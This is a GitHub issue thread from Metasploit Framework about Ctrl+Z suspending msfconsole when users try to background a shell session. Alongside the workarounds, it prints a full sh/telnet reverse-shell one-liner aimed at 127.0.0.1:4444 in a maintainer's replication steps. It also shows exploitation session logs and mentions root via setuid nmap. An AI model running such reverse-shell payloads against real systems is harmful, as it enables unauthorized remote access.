rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Cannot background command shell (non-meterpreter payloads) #8860

Closed fsacer closed 2 years ago

fsacer commented 7 years ago

Steps to reproduce

How'd you do it?

  1. Run an exploit on Unix (probably a problem for Windows too) using the normal exploit command.
  2. Press Ctrl+Z to try to background it.

Expected behavior

It should background command session without closing msfconsole.

Current behavior

It closes msfconsole. What's weird is that it shows the "do you want to background?" prompt after it closes msfconsole.

System stuff

Metasploit version

metasploit v4.15.7-dev

I installed Metasploit with:

OS

Kali

PS: I can background with exploit -z, but I still cannot interact with the shell and then background it. Is there a way to rebind the background key?

Also another question: I got root on a VM manually using the setuid nmap vuln and the command nmap --script script.txt, but I couldn't get it to persist through the whole command session. Is there a way to do that and make the meterpreter shell root? I used the setuid_nmap exploit module but that one did not work for me.

fsacer commented 7 years ago

As a workaround this works:

fsacer commented 6 years ago

I think this can be closed for now since that was kinda fixed I guess.

fsacer commented 6 years ago

This still seems to be happening with the cmd/unix/reverse payload: Framework: 4.17.2-dev-, Console: 4.17.2-dev-

fsacer commented 6 years ago

I can also reproduce this for powershell and windows reverse shell payloads on v4.17.4-dev-. Also, this might depend on the desktop manager (specifically, I got this to happen on LXDE now and Gnome in the past).

usama7628674 commented 6 years ago

@fsacer I tested in the Gnome desktop manager.

usama7628674 commented 6 years ago

@fsacer Okay, so it does background, but not in the sense that I could use meterpreter commands; upon re-interacting with the session it still goes back to the powershell terminal. Only powershell commands work because it's only a powershell session.

mbloms commented 6 years ago

I experienced this issue today. The SIGTSTP signal is not caught. When pressing Ctrl+Z the whole process is put in the background. I can get it back by using fg, and then I can type "y" to put the session in the background.

Tested with fish and bash on manjaro linux. Metasploit 4.17.5

msf exploit(linux/samba/is_known_pipename) > sessions -i 1
[*] Starting interaction with 1...

Job 1, 'msfconsole -r login.rc' has stopped

Background session 1? [y/N]  ⏎
micke@Humlan ~/D/E/f/flag_07460> fg
Send job 1, “msfconsole -r login.rc” to foreground
y
msf exploit(linux/samba/is_known_pipename) >
jeffmcjunkin commented 5 years ago

This normally still affects the latest msfconsole version:

msf5 > version
Framework: 5.0.35-dev-
Console  : 5.0.35-dev-

I like the workaround given above, with one tweak:

# cat /usr/local/bin/msfconsole 
#!/bin/sh
trap "" TSTP
/usr/bin/msfconsole "$@"

The "$@" part means arguments given to msfconsole will still apply (background: https://stackoverflow.com/a/4824637/372377). I also gave the wrapper script the same name, but since it's under /usr/local/bin/ (which is earlier in the $PATH), the wrapper script is called when running msfconsole.

Since this breaks some post-exploitation functionality otherwise (there's no way to exit powershell_shell inside meterpreter, for example, without Ctrl-Z), I'd recommend Rapid7 consider solving in the released versions.

ZeR0AbSoLu commented 5 years ago

Got the same problem on metasploit v5.0.28-dev on Arch Linux. I can't background a shell/session with Ctrl+Z; it backgrounds msfconsole itself.

buneeflacs commented 5 years ago

OK, this may or may not help anyone at this point, but I noticed I've been having this problem when I open msf with 'msfdb run' and not 'msfconsole'. I opened msf using the console command and it backgrounds the session and not all of Metasploit... just my observation.

sh317er commented 4 years ago

Bringing this back from the dead to confirm @buneeflacs comments

If using 'msfdb run' it will fail. Use 'msfconsole' if you intend to use ctrl+z to background your sessions without making modifications to your msfconsole.sh file

adfoster-r7 commented 4 years ago

I haven't been able to replicate this with msfconsole. I did replicate with msfdb run - however that code doesn't live within metasploit-framework and is currently maintained by Kali:

https://gitlab.com/kalilinux/packages/metasploit-framework/-/blob/911ae0bf28bc34effbc6ff7709aa559d0b3adfbc/debian/extra/msfdb

If there's replication steps for msfconsole this is something I can look into further

As a workaround for backgrounding msfdb run you can add:

#!/bin/sh
trap "" TSTP

To the start of /usr/bin/msfdb, but it will stop you from completely backgrounding msfconsole.


My replication steps for Kali and msfdb run were

Creating the cmd/unix/reverse listener + payload:

sudo msfdb run
use cmd/unix/reverse
set LHOST 127.0.0.1
generate -f raw

to_handler

Copy the stdout payload into a new shell and run it:

$ sh -c '(sleep 3602|telnet 127.0.0.1 4444|while : ; do sh && break; done 2>&1|telnet 127.0.0.1 4444 >/dev/null 2>&1 &)'

Swapping back to the previous shell and interacting with it:

msf5 payload(cmd/unix/reverse) > [*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 22NSKBnp2W9syQws;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "22NSKBnp2W9syQws\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.222.1:4444 -> 192.168.222.130:34418) at 2020-07-29 11:05:08 +0100

msf5 payload(cmd/unix/reverse) > sessions -i 1
[*] Starting interaction with 1...

Attempting to foreground the session:

^Z
[1]+  Stopped                 sudo msfdb run
kali@kali:~$ 
Background session 1? [y/N]  y
bash: y: command not found

kali@kali:~$ 
MathiasGoulart commented 3 years ago

Well, I'm facing the same problem here running:

Ubuntu 20.04 LTS
MTE: 6.0.18-dev

I could work around that just by switching to a non-existent session:

meterpreter > sessions 1
[*] Session 1 is already interactive.
meterpreter > sessions 2
[*] Backgrounding session 1...
[-] Invalid session identifier: 2
github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 3 years ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

adfoster-r7 commented 3 years ago

This is definitely still an issue, but without exact replication steps it hasn't been possible to resolve this

label-actions[bot] commented 3 years ago

It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.

This includes:

The easier it is for us to replicate and debug an issue means there's a higher chance of this issue being resolved.

jeffmcjunkin commented 3 years ago

What more do you need for replication steps? I thought your steps above (https://github.com/rapid7/metasploit-framework/issues/8860#issuecomment-665577458) were enough, @adfoster-r7?

An easy example is getting any Windows meterpreter, then running load powershell followed by powershell_shell.

How does one exit that channel without Ctrl-Z (SIGTSTP) being trapped by msfconsole, so it's not handed to the underlying shell?

qxssong commented 3 years ago

I'm facing the same problem:

macos catalina 10.15.7 
MTE: v6.0.48-dev

Cannot background command shell, just suspended msfconsole

meterpreter > shell
Process 3700 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\test\Desktop>^Z
[1]  + 32883 suspended  msfconsole

~$
souvikhaldar commented 3 years ago

I am facing the same issue in kali running inside vmware fusion in Mac OS Big Sur.

bcoles commented 3 years ago

I am facing the same issue in kali running inside vmware fusion in Mac OS Big Sur.

Please provide steps to reproduce this issue.

souvik-cv commented 3 years ago

I am facing the same issue in kali running inside vmware fusion in Mac OS Big Sur.

Please provide steps to reproduce this issue.

I gained a shell practising the Blue room of TryHackMe. Then, when I tried to use the post module for shell to meterpreter and before that pressed Ctrl-Z, that is when I faced the issue as mentioned at the top. Basically, the steps mentioned in the Blue room of TryHackMe.

woolcoxm commented 3 years ago

This is happening to me in all versions of Metasploit for the last month.

I've installed 3 different versions of Linux, installed 4 or 5 different versions of Metasploit, even went back an entire version (6 to 5).

This workaround doesn't work; I set it up and it catches the Ctrl+Z but doesn't let me background anything or exit.

OSes I've tried: Kali, Parrot OS, Ubuntu, Windows.

All Linux distros were using KDE Plasma.

Windows was Windows 10 with the latest patches.

I'm stuck. Any help would be lovely.

sempervictus commented 3 years ago

This is how i've run msfconsole since the readline wars:

#!/bin/sh
# 20 is SIGTSTP on x86/ARM Linux; trap "" TSTP is the portable spelling
trap "" 20
export RAILS_ENV=production
export RUBYOPT="-W0"
rvmsudo /opt/metasploit4/msf4/msfconsole -q -r /home/<myusername>/.msf4/msfconsole.rc -L

seems to work fine on Arch Linux when backgrounding shells inside meterp sessions and the sessions themselves.

bona-ws commented 3 years ago

I experienced this issue today. The SIGTSTP signal is not caught. When pushing Ctrl+Z the whole process is put in the background. I can get it back by using fg, and then I can put "y" to put the session in background.

Tested with fish and bash on manjaro linux. Metasploit 4.17.5

msf exploit(linux/samba/is_known_pipename) > sessions -i 1
[*] Starting interaction with 1...

Job 1, 'msfconsole -r login.rc' has stopped

Background session 1? [y/N]  ⏎
micke@Humlan ~/D/E/f/flag_07460> fg
Send job 1, “msfconsole -r login.rc” to foreground
y
msf exploit(linux/samba/is_known_pipename) >

This worked for me. Or you can simply type the "background" command; that also worked in my case.

jeffmcjunkin commented 3 years ago

Since this doesn't seem to be fixed upstream, has multiple reports and a reproducible path, can one of the Rapid7 folk re-open and re-examine this issue? Maybe @adfoster-r7 ?

adfoster-r7 commented 3 years ago

@jeffmcjunkin I've still had no luck replicating this with the default msfconsole with a slightly older Kali using /usr/bin/msfconsole with the default /bin/bash shell, as well as Kali 2021.2 /usr/bin/zsh

Here's the steps I was following from your comment above https://github.com/rapid7/metasploit-framework/issues/8860#issuecomment-780216352

msf6 payload(cmd/windows/reverse_powershell) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > pwd

Path
----
C:\Users\a

PS > ^Z
Background channel 1? [y/N]  y
meterpreter > 
Background session 2? [y/N]  
msf6 payload(cmd/windows/reverse_powershell) > 

My msfconsole script on Kali:

$ cat $(which msfconsole) | head -n 20
#!/usr/share/metasploit-framework/ruby
# -*- coding: binary -*-
#
# This user interface provides users with a command console interface to the
# framework.
#

require 'pathname'
begin

  # Silences warnings as they only serve to confuse end users
  if defined?(Warning) && Warning.respond_to?(:[]=)
    Warning[:deprecated] = false
  end

  # @see https://github.com/rails/rails/blob/v3.2.17/railties/lib/rails/generators/rails/app/templates/script/rails#L3-L5
  require Pathname.new(__FILE__).realpath.expand_path.parent.join('config', 'boot')
  require 'msfenv'
  require 'metasploit/framework/profiler'
  require 'metasploit/framework/command/console'

If you're on a different operating system / shell / different msfconsole wrapper, let me know :+1:

jeffmcjunkin commented 3 years ago

@adfoster-r7 I'm using the nightly installer packages, with dependencies installed via https://github.com/trustedsec/ptf, on Ubuntu 18.04, 20.04, and Debian 10, all 64-bit.

Is the msfconsole wrapper from Kali part of the framework, or is that a custom Kali thing? That could explain why many people aren't hitting this, if it's a custom Kali thing.

adfoster-r7 commented 3 years ago

@jeffmcjunkin Thanks! I was able to confirm that the nightly installer packages have this issue, rather than framework itself which is what I was initially testing above.

Can you check this PR out and let me know if the fix works for you? https://github.com/rapid7/metasploit-omnibus/pull/160 The easiest way to verify the fix might be to edit those lines into wherever your msfconsole is, i.e. vim $(which msfconsole)

jeffmcjunkin commented 3 years ago

This worked great for me, both with WSL2 / Ubuntu 20.04 on Win10, as well as on Debian 10 (buster / oldstable), both with the latest nightly installers and the manual patch. Thank you, and I'm good with closing the issue entirely.

adfoster-r7 commented 3 years ago

A fix should be available in the next release of the nightly Rapid7 builds of Metasploit https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

adfoster-r7 commented 2 years ago

This should be fixed by https://github.com/rapid7/metasploit-omnibus/pull/160 if you've installed Metasploit framework via the omnibus installer.

This will still be an issue with Kali's custom msfdb wrapper, as it looks like a similar fix might be needed over in their Gitlab repo. I've raised an issue for that over here

Closing for now :+1:

Edit: This should be fixed in Kali now too:

It should be fixed in version 6.1.37-0kali2. The package will be soon in kali-rolling

noraj commented 2 years ago

Similar fix needed for other distro wrappers: